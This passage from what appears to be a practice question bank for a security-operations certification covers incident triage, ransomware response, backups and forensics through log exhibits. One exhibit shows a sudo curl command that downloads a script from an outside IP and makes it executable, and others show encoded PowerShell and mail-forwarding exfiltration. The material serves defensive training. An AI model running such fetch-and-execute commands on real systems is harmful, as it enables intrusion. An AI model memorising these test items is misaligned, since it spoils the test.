- Nightly full backup at 01:00
- Backup repository: NAS-BACKUP01
- NAS-BACKUP01 is joined to the same Active Directory domain as production servers
- Backup share is mounted over SMB from the production network
- Last restore test: 5 months ago, failed due to permissions error

Business targets:
- RTO: 4 hours
- RPO: 30 minutes
Question 126hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what is the most likely conclusion after correlating the logs?

A configuration-management task ran from a jump host and generated repeated login alerts on target servers. The SOC wants to determine whether this is malicious activity or approved automation.

Exhibit

Change window: approved 01:00-02:00

01:11:44 jump01  ssh to appsrv02 as configsvc from 10.1.10.20
01:11:47 jump01  ssh to appsrv03 as configsvc from 10.1.10.20
01:12:01 appsrv02 auth.log  2 failed password attempts for configsvc, then success with SSH key
01:12:04 appsrv03 auth.log  1 failed password attempt for configsvc, then success with SSH key
01:12:10 SIEM rule 'brute force against privileged account' triggered
CMDB / automation note: configsvc is restricted to Ansible playbooks launched only from jump01 during maintenance windows
Question 127hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what is the best immediate action for the SOC or IR team?

A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

Exhibit

Host: finance-lap07
10:22:11  winword.exe spawned powershell.exe -enc <redacted>
10:22:14  powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02  file rename activity: 184 files changed to *.locked
10:24:09  outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01  EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'
Question 128hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what is the best eradication decision for the server compromise?

Exhibit

Linux server audit summary: APP-SRV14
10:22:13  sshd: Accepted publickey for appsvc from 10.5.14.22
10:23:01  sudo: appsvc ran /usr/bin/curl https://198.51.100.44/p.sh -o /tmp/.x
10:23:09  sudo: appsvc ran chmod +x /tmp/.x
10:23:11  /tmp/.x created /etc/cron.d/.maint
10:23:20  /etc/ssh/sshd_config modified to allow PasswordAuthentication yes
10:24:02  outbound traffic blocked by segmentation rule
IR note: host is isolated, disk image has not been taken yet, and the business wants the service restored today
Question 129mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst reviews email platform logs for a finance user account. At 08:12, the user successfully signs in from Denver. At 08:15, the same account signs in from a residential ISP in another state. At 08:16, the mailbox creates a new external forwarding rule and deletes the original alert message. The user says they did not set up forwarding. What is the best assessment?

Question 130mediummultiple choice
Read the full Security Operations explanation →

A scan keeps reporting the same medium-severity TLS configuration issue on a public web server. The application owner says the vendor software cannot be changed until next quarter, but they can place the service behind a reverse proxy that enforces stronger cipher settings. How should the issue be handled in the vulnerability management process?

Question 131mediummultiple choice
Read the full NAT/PAT explanation →

Based on the exhibit, what is the most likely explanation for the alert?

Exhibit

Network and endpoint logs for workstation WS-204

10:12:08  DNS query from WS-204 to 10.20.1.15 for wpad.corp.local
10:12:09  HTTP request from WS-204 to 10.20.1.15 for /wpad.dat
10:12:10  Proxy auto-detect enabled in browser policy
10:12:11  Traffic from WS-204 now exits through proxy 10.20.1.15

Asset inventory:
- 10.20.1.15 = CORP-PROXY01
- CORP-PROXY01 is listed as the approved outbound web proxy
Question 132mediummulti select
Read the full NAT/PAT explanation →

A SIEM rule flags a Linux server because it makes outbound HTTPS connections to the same cloud IP every 15 minutes. The server runs an approved patch agent that should check in on a regular schedule. Which two checks best validate whether the alert is a false positive? Select two.

Question 133mediummulti select
Read the full Security Operations explanation →

A legacy application server has a critical vulnerability, but the vendor will not release a fix for 30 days. Which two compensating controls are the best short-term risk reduction steps? Select two.

Question 134mediummultiple choice
Read the full NAT/PAT explanation →

An IDS raises an alert for a possible SQL injection attack against an internal reporting portal. The web server logs show the source IP belongs to the company's vulnerability scanner, and the requests match the scanner's normal test pattern. What is the most appropriate analyst action?

Question 135easymultiple choice
Read the full Security Operations explanation →

A SIEM alert shows a workstation connecting to the same unknown internet address every 15 minutes, even after business hours. The device belongs to an employee who is on vacation. What is the best next step for the analyst?

Question 136mediummulti select
Study the full AAA explanation →

A ransomware incident encrypted a file share and the attached NAS backups because the NAS stayed mounted to production and was reachable over SMB. Which two design changes would have reduced the blast radius most effectively? Select two.

Question 137mediummulti select
Read the full Security Operations explanation →

An EDR alert shows winword.exe launching powershell.exe with an encoded command after a user opened an invoice attachment. No new executable file was written to disk, and the host is still online. Which two actions should the SOC analyst take first to validate the alert and collect usable evidence? Select two.

Question 138mediummultiple choice
Read the full Security Operations explanation →

At 10:15, a file server begins renaming documents and creating payment notes. The SOC confirms the server is also making SMB connections to other internal hosts, but users can still access shared folders. What should the incident handler do FIRST?

Question 139hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which issue should be remediated first by the operations team?

A small company has limited maintenance windows and can address only one of several findings this week.

Exhibit

Weekly vulnerability report:

1. vpn-gw01
   - Exposure: Internet-facing
   - Finding: Critical remote code execution
   - Notes: Vendor patch available; reboot required

2. db-lab02
   - Exposure: Internal only
   - Finding: High-severity authentication bypass
   - Notes: Isolated lab subnet; no sensitive data; no route to production

3. printsrv03
   - Exposure: Internet-facing administrative portal
   - Finding: Medium-severity outdated firmware
   - Notes: Vendor has not released a fix yet; temporary ACL blocks the admin port from the internet
Question 140mediummultiple choice
Read the full Security Operations explanation →

A vulnerability dashboard shows four new findings. Which one should be remediated first by the operations team?

- A low-severity issue on an offline lab VM - A medium-severity issue on a payroll server with no known exploit - A critical issue on an internet-facing web server with an available exploit - A high-severity issue on a test workstation that is not domain joined

Question 141hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what is the best eradication decision after containment?

A quarantined endpoint was found to have a malicious startup item and a scheduled task. The team has already isolated it from the network and preserved memory for analysis.

Exhibit

Host: eng-lt-44
Containment status: network quarantined

Registry artifact:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = C:\Users\maria\AppData\Roaming\update.exe

Scheduled task:
TaskName: SysMaint
Action: C:\Users\maria\AppData\Roaming\update.exe /svc
Trigger: every 30 minutes

File hash:
update.exe SHA256 matches known malware family 'QuillDoor'

User impact:
- Browser pop-ups observed earlier
- No confirmed encryption
- No evidence of additional hosts compromised
Question 142mediummultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which finding is the best candidate for immediate remediation or emergency mitigation?

Exhibit

Prioritized vulnerability review

Asset             Severity   Exposure                    Notes
---------------------------------------------------------------
VPN-EDGE01        Critical   Internet-facing             Remote code execution; exploit proof-of-concept publicly available
FILE-02           High       Internal file server        SMB service outdated; only reachable from corp subnet
TEST-VM-17        High       Isolated test network       No route from production; development team owns it
PRINTER-3F        Medium     Office user VLAN            Default admin credentials; management interface reachable via HTTP
Question 143mediummultiple choice
Read the full Security Operations explanation →

A user reports that a shared department drive is rapidly renaming files and creating ransom notes on a Windows file server. The SOC confirms suspicious activity is still occurring on that server. What should the incident responder do first?

Question 144hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what is the most important next IR action?

Exhibit

Microsoft 365 audit trail for user amaya@corp.example:
09:41 User clicked link from external message and signed into a lookalike portal
09:42 OAuth consent granted to app 'ExpenseReport-Helper' scopes=Mail.Read, offline_access, User.Read
09:44 Inbox rule created: if subject contains 'invoice' then forward to finance-relay@external.example
09:46 Refresh token issued from unfamiliar IP 203.0.113.88
09:51 Admin deleted inbox rule
09:52 Password changed successfully
Question 145mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst receives an alert that a domain admin account authenticated to a file server at 02:14 from a jump host that is normally used only by the infrastructure team. The Windows logs also show a scheduled task launching a backup script at the same time, and the backup team says the task was created during yesterday's change window. What is the best next step to determine whether this is a false positive?

Question 146mediummultiple choice
Read the full Security Operations explanation →

A branch office stores nightly backups on a NAS that is joined to the same Active Directory domain as the production servers. After a ransomware incident, management wants a backup design that is much harder for attackers to encrypt or delete. Which approach is the best improvement?

Question 147mediummultiple choice
Read the full NAT/PAT explanation →

An IDS generates an alert for possible SQL injection against an internal reporting portal at 02:00. The web logs show the source IP belongs to the company's approved vulnerability scanner, the request path matches the scheduled test window, and the WAF blocked the request. What is the most appropriate analyst conclusion?

Question 148mediummultiple choice
Read the full Security Operations explanation →

An engineering firm backs up its file server every night to a NAS that is always mounted to the production domain. After a ransomware event, management asks for the most effective improvement to reduce the chance that backups are encrypted along with production data. What should be recommended?

Question 149mediummultiple choice
Read the full VPN explanation →

A monthly vulnerability scan identifies a critical vulnerability on a public-facing VPN appliance, but the vendor says no patch is available yet. The service must remain online for remote workers. What is the best compensating control to reduce risk right away?

Question 150easymultiple choice
Read the full Security Operations explanation →

After a phishing account compromise has been contained and the attacker’s mailbox forwarding rule was removed, what should the team do next?

Question 151mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst receives a SIEM alert for a possible brute-force attack against a remote access portal. The alert shows 240 failed logins from the same source IP over 4 minutes, followed by one successful login. Before escalating as an incident, what is the BEST evidence to check to determine whether the alert is a false positive caused by approved activity?

Question 152hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which change best improves both recovery time and recovery point for the ERP database?

A mid-sized company has a two-hour RTO and a 30-minute RPO, but its current backup design cannot meet either objective during restore testing.

Exhibit

System: ERP database cluster
Business requirements:
- RTO = 2 hours
- RPO = 30 minutes
Current recovery design:
- Nightly full backup at 23:00 to onsite NAS
- Differential backup at 12:00
- Weekly copy replicated to cloud on Sundays
Restore test results:
- Cold rebuild of VM + database restore: 5 hours 40 minutes
- Data gap since last backup: 2 hours 18 minutes
- NAS is online and joined to the same domain as production servers
Question 153easymultiple choice
Read the full Security Operations explanation →

A vulnerability scan finds a critical flaw on a public-facing server and a medium flaw on a lab system that is not connected to the production network. Which issue should be fixed first?

Question 154mediummultiple choice
Read the full NAT/PAT explanation →

An EDR console reports possible beaconing from a workstation because it makes outbound HTTPS connections to the same cloud IP every 15 minutes. The workstation belongs to the patch-management team, and the destination resolves to a vendor update service. Which evidence best supports closing the alert as a false positive?

Question 155easymultiple choice
Read the full Security Operations explanation →

A technician restores a file server from backup, but the business wants confidence that the recovery process will work during an outage. What should the team do most often to validate the backups?

Question 156hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what is the best-supported conclusion for the SOC analyst?

Exhibit

DNS telemetry for host LAP-09:
10:14:02  query=TXT  name=k7f3a9d1a.reporting-updates.net  client=10.1.8.44
10:15:02  query=TXT  name=m2b8c4.reporting-updates.net       client=10.1.8.44
10:16:02  query=TXT  name=q9z1x7.reporting-updates.net       client=10.1.8.44
10:17:02  query=TXT  name=t4n8p2.reporting-updates.net       client=10.1.8.44
Packet summary: 58-byte UDP responses, repeated every 60 seconds
Proxy logs: no HTTP or HTTPS sessions to reporting-updates.net
EDR: python.exe launched by signed pdf reader, process exited in 3 seconds
EDR network telemetry: same pattern continued after the document closed
Question 157mediummultiple choice
Read the full Security Operations explanation →

A file server in the accounting department begins renaming documents and dropping ransom notes. The SOC confirms encryption is still in progress, and the server hosts a share used by several finance teams. What should the incident response team do first?

Question 158mediummultiple choice
Read the full NAT/PAT explanation →

An EDR alert flags suspicious PowerShell on a finance workstation. Windows logs show the script started immediately after a patch-management tool launched from the software distribution server. The script only queries installed software and writes results to a log file. What is the most likely conclusion?

Question 159easymultiple choice
Read the full Security Operations explanation →

A company wants to make sure it can recover quickly after ransomware, even if the production network is unavailable. Which backup approach is the best choice?

Question 160easymultiple choice
Review the full subnetting walkthrough →

A SOC analyst sees 20 failed logins for one user account, followed by a successful login 30 seconds later from the same office subnet. The user confirms they mistyped the password several times. What is the best conclusion?

Question 161mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst confirms that an employee entered credentials into a phishing site and that the mailbox now shows a new forwarding rule sending messages to an external address. The account is still signed in on a laptop and a mobile phone. What is the best next action?

Question 162easymultiple choice
Read the full NAT/PAT explanation →

A legacy application cannot be patched for two weeks, but the security team still wants to reduce risk in the meantime. What is the best temporary measure?

Question 163mediummultiple choice
Read the full NAT/PAT explanation →

A weekly scan reports three findings: a medium-severity missing patch on a lab VM with no network access, a high-severity default credential on a management interface reachable from the internet, and a low-severity outdated browser plug-in on a visitor kiosk. Which issue should be remediated first?

Question 164mediummultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which action should the incident response team take next to eradicate the threat?

Exhibit

EDR timeline - WS-224
11:07  User opened invoice.docm
11:08  winword.exe spawned powershell.exe -enc <redacted>
11:09  PowerShell created C:\ProgramData\updater.vbs
11:10  Scheduled task 'UpdaterSvc' created to run at logon
11:12  Outbound connection blocked to 203.0.113.77:8443
11:14  Host isolated from the network
11:16  Memory capture completed

Analyst note:
  The workstation was used for finance approvals during the last hour.
  No other hosts have shown the same indicators yet.
Question 165hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which change best improves recovery resilience against a repeat ransomware incident?

Exhibit

Current backup design:
- Production file server backs up nightly at 23:00 to NAS-Backup over SMB.
- NAS-Backup is mounted read/write to the file server 24x7.
- Weekly copy job replicates NAS contents to cloud object storage.
- Backup credentials are shared with the server admin group.
- Last restore test: 14 months ago.
Incident summary:
- Ransomware encrypted production files and then encrypted the NAS share using the same credentials.
Question 166mediummultiple choice
Read the full VPN explanation →

A monthly scan finds a critical remote-code-execution issue on an internet-facing VPN appliance. The vendor has released a fix, but the appliance can only be rebooted during the weekend maintenance window in five days. What is the BEST immediate action to lower risk until patching can occur?

Question 167mediummultiple choice
Read the full NAT/PAT explanation →

A Linux host is patched, but the scanner still flags the package as vulnerable. The vendor advisory says the distribution backported the fix, so the package version did not change. What should the analyst do before closing the ticket?

Question 168mediummultiple choice
Read the full Security Operations explanation →

A file server is actively renaming documents and generating ransom notes. The server hosts a shared drive used by finance, and users are still online. What is the best immediate action?

Question 169mediummulti select
Read the full NAT/PAT explanation →

A SIEM alert shows a workstation making repeated outbound HTTPS connections every 15 minutes to the same cloud IP address. The host belongs to the patch-management group, and the security team suspects an approved agent may be responsible. Which two checks best validate whether this is a false positive? Select two.

Question 170mediummultiple choice
Read the full Security Operations explanation →

A branch office uses a NAS for nightly backups, but the NAS is joined to the same domain as the production servers. After ransomware encrypted both production data and backups, management wants the most effective change to reduce the chance of backup tampering without a major redesign. Which control should be implemented?

Question 171mediummultiple choice
Read the full Security Operations explanation →

After containment and eradication of malware on several laptops, the team restores the devices from known-good images and verifies that users can authenticate and access email. Which action should occur NEXT to complete the incident response lifecycle and reduce future impact?

Question 172mediummulti select
Read the full Security Operations explanation →

A SOC analyst confirms that a user entered corporate credentials into a fake sign-in page. Mailbox logs now show a new forwarding rule sending messages to an external address, and the attacker may still have an active session. Which two actions should the analyst take first to contain the account compromise? Select two.

Question 173mediummultiple choice
Read the full VPN explanation →

A critical vulnerability is discovered on an internet-facing VPN appliance that cannot be patched for six weeks because the vendor has not released a fix. The VPN service must remain available. What is the best operational response?

Question 174mediummultiple choice
Read the full Security Operations explanation →

A systems administrator says the backup software reports success every night, but no one has restored a server from backup in over a year. The business wants confidence that a file server can be recovered within the agreed recovery window. What is the best next action?

Question 175easymultiple choice
Read the full Security Operations explanation →

A user reports that their laptop is suddenly encrypting files and showing a ransom note. What should the incident response team do first?

Question 176mediummultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what should the team do next after the account has been contained?

Exhibit

Email security investigation for user amiller

- User submitted credentials on a fake sign-in page at 08:22
- Password was reset at 08:35
- Active sessions were revoked at 08:36
- Mailbox audit now shows:
  * Inbox rule: 'FinanceDocs' forwards any message with 'invoice' to external address redacted@proton.example
  * OAuth consent granted to unknown application 'QuickDocs Sync'
  * Deleted Items folder contains no suspicious messages

Help desk confirms the user still has access to the mailbox after reset.
Question 177mediummulti select
Read the full Security Operations explanation →

Management wants to ensure a file server backed up every night can actually be restored within a 4-hour recovery time objective after an incident. Which two actions best improve recovery confidence? Select two.

Question 178easymulti select
Read the full Security Operations explanation →

A Linux administrator must run a weekly maintenance script on 40 servers without giving technicians interactive root access. Which two practices best support secure administration? Select two.

Question 179mediummultiple choice
Read the full Security Operations explanation →

After a suspicious laptop is imaged with a write blocker, the original drive is sealed and stored. Before a second analyst examines the image, what is the most important next step to preserve admissibility?

Question 180mediummultiple choice
Read the full Security Operations explanation →

A server room is located next to a chilled-water pipe, and facilities staff want the earliest possible warning if moisture starts leaking under the raised floor. Which control is the best fit?

Question 181hardmulti select
Read the full Security Operations explanation →

An email security team receives a macro-enabled spreadsheet from a known supplier. The file must be analyzed before users open it, and if it proves malicious, the organization wants to stop the same attachment from reaching other inboxes. Which two tools are the best fit? Select two.

Question 182hardmatching
Read the full Ansible explanation →

Match each incident response activity to the phase of the incident response lifecycle it best represents. Use each option once.

1. A SOC analyst disables a compromised account, isolates the workstation from the network, and preserves volatile evidence. 2. The team images the infected system, removes the malicious persistence mechanism, and patches the exploited vulnerability. 3. After restoring services, the team reviews timeline gaps, detection delays, and control failures with management. 4. Before the attack occurs, the team verifies contact lists, playbooks, escalation paths, and backup credentials. 5. The team confirms suspicious authentication logs, endpoint alerts, and unusual outbound traffic indicate an active compromise.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Containment

Eradication

Lessons learned

Preparation

Identification

Question 183hardmulti select
Read the full Security Operations explanation →

A finance workstation begins encrypting local files, and the EDR console shows the process is also enumerating SMB shares on adjacent hosts. The user reports no suspicious email and is still logged in. Management wants the fastest containment step that minimizes spread and the best follow-up action to preserve useful evidence. Which two actions should the SOC take first? Select two.

Question 184mediummultiple choice
Read the full NAT/PAT explanation →

A SIEM analyst reviews authentication logs and sees the following pattern over 15 minutes: 68 different user accounts each had one failed login attempt from the same source IP, followed by no lockouts, and then one of the accounts successfully authenticated from that same IP using a valid password. What is the most likely explanation?

Question 185mediummultiple choice
Read the full Security Operations explanation →

After a ransomware incident, management learns the attacker's stolen domain admin credentials were used to delete recent online backups from the same backup network. Which backup strategy would have most reduced the chance of permanent backup loss?

Question 186mediummultiple choice
Read the full NAT/PAT explanation →

The email security team receives a suspicious invoice attachment from a vendor. The attachment is not blocked by signature-based detection, but the team wants to observe its behavior in a safe environment before delivery to users. What tool best fits this requirement?

Question 187mediummultiple choice
Read the full NAT/PAT explanation →

A nightly patch script restarts services on 40 Linux servers. Security does not want an administrator to log in interactively, and the script should only have the permissions needed to install approved patches and restart those services. What is the best design?

Question 188easymultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which control should be installed or expanded to provide the earliest warning of this hazard?

Exhibit

Data Room Environmental Sensor Log
10:15  Humidity: 82%
10:16  Leak Sensor Under Rack 7: Dry
10:17  Leak Sensor Under Rack 7: Wet
10:18  Water Detected Under Raised Floor
Facilities Note: 'Condensation forms on the chilled-water pipe during humid afternoons.'
Question 189mediummultiple choice
Read the full Security Operations explanation →

An investigator must collect data from a suspected insider-threat laptop so the evidence could be used in an HR and legal review. Which action best preserves admissibility?

Question 190mediummultiple choice
Read the full VPN explanation →

A SIEM alert shows 300 failed logins against the same VPN account from one source IP over 12 minutes, followed by a successful login from that same IP and a spike in mailbox access. The user says they did not initiate the session. What is the most likely cause?

Question 191easymultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which change best improves secure administration for the scheduled task?

Exhibit

Windows Task Scheduler Settings
Task Name: DailyLogArchive
Run As: Administrator
Trigger: Daily at 01:00
Action: powershell.exe -File C:\Scripts\Archive.ps1
Security Options: 'Run only when user is logged on' = Enabled
Note: The script only copies logs to a shared archive location.
Question 192mediummultiple choice
Read the full VPN explanation →

A SIEM correlates VPN authentication logs and sees 14 different user accounts receive one failed login attempt each from the same source IP during a 5-minute window. A few minutes later, one of those accounts successfully authenticates from that same IP. Which attack is most likely?

Question 193hardmulti select
Read the full Security Operations explanation →

A security team receives a macro-enabled spreadsheet from a supplier. The file must be analyzed before any user opens it, and if the same payload later executes on an endpoint the organization wants the ability to contain it automatically. Which two tools best fit those requirements? Select two.

Question 194easymulti select
Review the full subnetting walkthrough →

A network analyst reviews packet captures from a subnet where users intermittently lose access to the gateway. Which two findings would most strongly indicate ARP spoofing? Select two.

Question 195hardmulti select
Read the full Security Operations explanation →

A Linux operations team must run a nightly maintenance script on 70 servers to rotate logs and restart one service. Security will not allow interactive SSH logins, and the script should only have the permissions required for those two commands. Which two configuration choices best meet the requirement? Select two.

Question 196mediummultiple choice
Read the full Security Operations explanation →

A system administrator must run a weekly maintenance script that stops and restarts two services on 50 Linux servers. Security says the job must not use an interactive login and should have only the permissions needed for that task. What is the best approach?

Question 197mediummultiple choice
Read the full Security Operations explanation →

A public web application is seeing bursts of requests that contain SQL metacharacters, encoded script tags, and attempts to POST to administrative endpoints. The team wants a control that can inspect HTTP traffic and block the malicious requests before they reach the app. What should be deployed?

Question 198mediummultiple choice
Read the full Security Operations explanation →

A help desk ticket reports that a user's Microsoft 365 mailbox sent hundreds of messages to external contacts, and the user says they are still receiving MFA prompts they did not start. The attacker may still have an active web session. What is the best first containment action?

Question 199mediummultiple choice
Read the full Security Operations explanation →

An investigator has just created a bit-for-bit image of a suspect's SSD using a write blocker. Before the drive is returned to evidence storage, what action most directly validates the integrity of both the original media and the image?

Question 200hardmulti select
Read the full Security Operations explanation →

After a ransomware incident, management sees that last night's backups completed successfully and wants proof they can actually be used before production is declared recovered. Which three actions best validate recoverability? Select three.

Question 201mediummultiple choice
Read the full Security Operations explanation →

After seizing a suspect's laptop, a responder creates a bit-for-bit disk image using a write blocker. The legal team wants the next step that most directly supports evidence integrity for later review. What should the responder do?

Question 202mediummultiple choice
Read the full Security Operations explanation →

A branch office's network closet has repeated unauthorized access issues after staff badge in and hold the door for others. Management wants a control that allows one person through after valid badge use and helps prevent tailgating. Which control is best?

Question 203hardmulti select
Read the full VPN explanation →

A SIEM analyst reviews the following sequence from a VPN and email platform over 15 minutes: 47 failed logins against different accounts from one public IP, one successful VPN login from that same IP, a new inbox forwarding rule to an external address, and a mailbox sign-in from a device never seen before. Which three findings most strongly support a password-spraying-to-compromise scenario? Select three.

Question 204hardmulti select
Read the full Security Operations explanation →

After a ransomware incident, management says backups are available but will not approve closure until the team proves the restore process works without risking production data. Which two actions best validate recoverability? Select two.

Question 205mediummultiple choice
Read the full Security Operations explanation →

A data center has repeated tailgating incidents at the entry to the server room. Management wants a control that forces one person to pass after badge authentication and prevents two people from entering together. What should be installed?

Question 206mediummultiple choice
Read the full Security Operations explanation →

A server room uses raised flooring and sits below a chilled-water pipe. Facilities wants the earliest warning if water starts accumulating under the floor tiles. Which control should be added?

Question 207easymulti select
Read the full Security Operations explanation →

After collecting a suspect laptop, the responder makes a bit-for-bit image of the drive. Which two actions best support chain of custody? Select two.

Question 208hardmulti select
Read the full NAT/PAT explanation →

An analyst receives a disk image and the original hash from a response team member. Before any examination begins, the analyst must be able to show the image is unchanged and that the evidence handling process is defensible. Which two actions are most important? Select two.

Question 209mediummultiple choice
Read the full Security Operations explanation →

A help desk technician receives an alert that an unmanaged laptop was plugged into a conference room network jack and was automatically placed into a restricted network segment until it passed a security check. Which control is responsible for that behavior?

Question 210hardmulti select
Read the full Security Operations explanation →

A records room has repeated tailgating after hours and occasional door propping during deliveries. Management wants one control that prevents follow-on entry and another that immediately alerts security if the door is forced open or left ajar. Which two controls best meet the need? Select two.

Question 211easymulti select
Read the full Security Operations explanation →

A data center wants to reduce tailgating at a sensitive room entrance. Which two controls are most effective? Select two.

Question 212hardmulti select
Read the full Security Operations explanation →

A responder has imaged a suspect laptop and needs to preserve the evidence for possible legal action. Which three actions best support chain of custody and admissibility? Select three.

Question 213easymulti select
Read the full Security Operations explanation →

A security team receives a suspicious email attachment and wants to inspect its behavior safely before any user opens it. They also want a tool that can isolate the same threat if it reaches an endpoint. Which two tools or capabilities best fit this need? Select two.

Question 214mediummultiple choice
Read the full NAT/PAT explanation →

A system administrator must run a weekly patch-and-restart job on 80 Linux servers without logging in interactively. The job should be repeatable, auditable, and limited to only the required maintenance commands. What is the best approach?

Question 215hardmulti select
Read the full Security Operations explanation →

A SOC analyst reviews an EDR alert showing powershell.exe launched with an encoded command, then immediately connected to an unfamiliar IP address and spawned rundll32.exe. The user is still logged in and the machine may still contain evidence needed for investigation. Which two actions should the analyst take first to contain the incident while preserving evidence? Select two.

Question 216easymultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which tool should the security team use to safely observe the attachment's behavior before delivery to users?

Exhibit

Email Security Gateway Queue
Message ID: 77129
From: vendor.billing@example.net
Subject: Updated invoice for Q4
Attachment: invoice_q4.xlsm
Attachment Type: Macro-enabled spreadsheet
Static Scan Result: No signature match
Dynamic Analysis Status: pending
Policy Action: hold for review
Question 217mediummultiple choice
Read the full Security Operations explanation →

Facilities sees occasional water droplets forming above the cable trays in a data room during humid afternoons. The team wants the earliest possible warning before equipment is damaged. Which control should be added?

Question 218hardmulti select
Read the full VPN explanation →

A SIEM correlates the following: 17 failed logons against the same VPN account from one IP in 9 minutes, a successful login from that IP, creation of a new API token in the SaaS tenant, and a large export job started two minutes later. Which two interpretations are best supported? Select two.

Question 219mediummultiple choice
Read the full Security Operations explanation →

A contractor connects a personal tablet to a lobby Ethernet jack. The network team wants the device blocked from internal resources until it passes posture checks and only guest access is allowed meanwhile. Which control best fits?

Question 220mediummultiple choice
Read the full Security Operations explanation →

After a ransomware event, management wants proof that last night's backups can actually support business operations before they declare recovery complete. What is the best action?

Question 221mediummultiple choice
Read the full Security Operations explanation →

A Linux operations team needs to run a nightly script that restarts one service and archives its logs on 60 servers. Security does not want an administrator to log in interactively, and the script should have only the permissions needed for that job. What is the best approach?

Question 222mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst confirms that a critical Linux virtual machine is making outbound connections to a known malicious IP address. The application owner says the VM hosts a revenue system that cannot be powered off without causing a major outage. What is the best containment action?

Question 223easymultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which control would best reduce unauthorized follow-on entry into the records room?

Exhibit

Facility Access Log
Location: Records Room Door 3
08:11  Badge ID 1441 Granted
08:11  Door Opened
08:12  Door Held Open Alarm Cleared
08:12  Badge ID 1441 Granted
08:12  Door Opened
Camera Note: 'Unknown person followed employee through the door.'
Question 224mediummultiple choice
Read the full VPN explanation →

A SIEM correlates VPN logs and sees the same public IP make one failed login attempt against 56 different user accounts over 25 minutes. The usernames vary, but the password value appears to be the same in each attempt. Ten minutes later, one of those accounts authenticates successfully from the same IP, and no password-reset events are recorded. Which attack pattern is most likely?

Question 225mediummultiple choice
Read the full Security Operations explanation →

Help desk staff must restart one Windows service and read its event logs on 150 servers, but they should not have local administrator rights or interactive logon to the systems. Which approach best supports this requirement?

Question 226mediummultiple choice
Read the full Security Operations explanation →

After seizing a suspected insider's laptop, a responder makes a bit-for-bit image of the drive. The legal team asks what step most directly proves the image was not altered after acquisition. What should be done?

Question 227easymulti select
Read the full Security Operations explanation →

A SOC analyst reviews one user account and sees several failed logins from a single IP, then a successful login from the same IP, followed by a new inbox forwarding rule to an external address. Which two findings most strongly suggest account compromise? Select two.

Question 228easymultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what should the team do next to confirm the backups can actually be used during an outage?

Exhibit

Backup Status Report
System: File Server FS-03
Nightly Backup Job: SUCCESS
Backup Sets Retained: 14
Last Successful Job: 02:00 today
Last Restore Test: 118 days ago
Note: No recent validation of file recovery has been recorded.
Question 229mediummultiple choice
Read the full Security Operations explanation →

A company is placing a customer-facing web application behind a new security control. The team wants to block malicious HTTP requests such as injection attempts before they reach the application server, with minimal code changes to the app itself. Which control is the best fit?

Question 230mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst receives an EDR alert showing a finance laptop creating encrypted archives and then attempting SMB connections to several internal file shares. The user is still logged in, and the business wants to stop possible spread without destroying volatile evidence. What should the analyst do first?

Question 231mediummultiple choice
Read the full NAT/PAT explanation →

An email attachment from an external supplier is not blocked by signature-based AV, but the SOC wants to see whether it drops files, launches child processes, or contacts suspicious domains before delivery to users. Which control best fits?

Question 232easymultiple choice
Read the full NAT/PAT explanation →

Based on the exhibit, what should the analyst do before opening the forensic image for examination?

Exhibit

Evidence Receipt Form
Case: 24-1187
Item: 4A
Description: SSD from workstation WS-14
Acquisition Method: Bit-for-bit image created with write blocker
Source SHA-256: 9e8f1a7c4c0d2f1b...
Image SHA-256: not yet calculated
Chain of Custody: pending analyst verification
Question 233mediummultiple choice
Read the full Security Operations explanation →

After hours, EDR alerts show a finance laptop encrypting local files and trying SMB connections to nearby workstations. The user is still logged in, and management wants the fastest step that limits spread while preserving evidence. What should the SOC do first?

Question 234mediummultiple choice
Read the full Security Operations explanation →

Following a ransomware incident, management wants to verify that backups are usable and that a restored file server will meet recovery expectations before declaring the system trusted again. Which action is best?

Question 235easymulti select
Read the full Security Operations explanation →

A workstation is suspected of running malware and contacting an unknown host. Which two actions belong in the containment phase? Select two.

Question 236easymulti select
Read the full Security Operations explanation →

After a ransomware event, management wants proof that backups can actually be used before trusting them. Which two activities best validate recoverability? Select two.

Question 237hardmulti select
Read the full Security Operations explanation →

A server room sits below a chilled-water line, and occasional condensation is forming on the pipe during humid afternoons. Facilities wants the earliest warning before water reaches equipment and a way to get an alert even if no one is onsite. Which two controls should be implemented? Select two.

Question 238hardmulti select
Read the full Security Operations explanation →

A post-incident review shows the SOC detected malicious PowerShell activity six hours late because the existing detections did not correlate the encoded command, the unusual outbound connection, and the creation of a scheduled task. Leadership wants the two follow-up actions most likely to improve future response. Select two.

Question 239mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst confirms that a workstation is encrypting local files and attempting SMB connections to nearby hosts. The user is still logged in, and the business wants to limit spread without destroying evidence. What is the best immediate action?

Question 240hardmulti select
Read the full Security Operations explanation →

A Linux operations team must run a nightly maintenance workflow on 60 servers to rotate logs and restart one service. Security does not allow interactive root logins, and every execution must be auditable. Which two practices best support secure administration? Select two.

Question 241mediummultiple choice
Read the full Security Operations explanation →

